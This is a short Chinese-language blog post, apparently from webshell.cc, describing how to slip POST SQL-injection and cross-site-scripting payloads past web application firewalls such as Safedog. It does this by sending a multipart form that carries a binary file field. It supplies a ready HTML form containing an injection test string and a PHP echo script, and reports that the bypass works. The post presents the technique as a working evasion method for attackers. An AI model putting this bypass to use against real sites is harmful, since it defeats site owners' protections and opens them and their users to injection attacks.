輕鬆繞各類WAF的POST注入、跨站防護(好比安全狗)

XXX以前有提過multipart請求繞過各類WAF方式：360網站寶/安全寶/加速樂及其餘相似產品防禦繞過缺陷之一，貌似沒引發多少人關注。今天發現安全狗變聰明瞭之前那套他不吃了，不過隨手給狗提交了一個二進制的文件域就XXOO了。注意必定要是二進制文件，圖片、壓縮包什麼的都行。

構建以下HTML表單：

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>yzmm - p2j.cn</title>
</head>
<body>
<form action="http://webshell.cc/index.php" method="POST" enctype="multipart/form-data">
File:<input type="file" name="file" /><br/>
ID:<input type="text" name="id" value="select 1 from mysql.user--" style="width:250px;" / ><br/>
<input type="submit" value="提交" />
</form>
</body>
</html>

index.php:

 

<?php
echo "POST-ID:".$_POST['id']."<br/>GET-ID:".$_GET['id'];
?>

提交帶二進制文件的請求：

成功繞過。

 

 

本站內容均爲原創，轉載請務必保留署名與連接！ 輕鬆繞各類WAF的POST注入、跨站防護(好比安全狗):http://www.webshell.cc/4464.html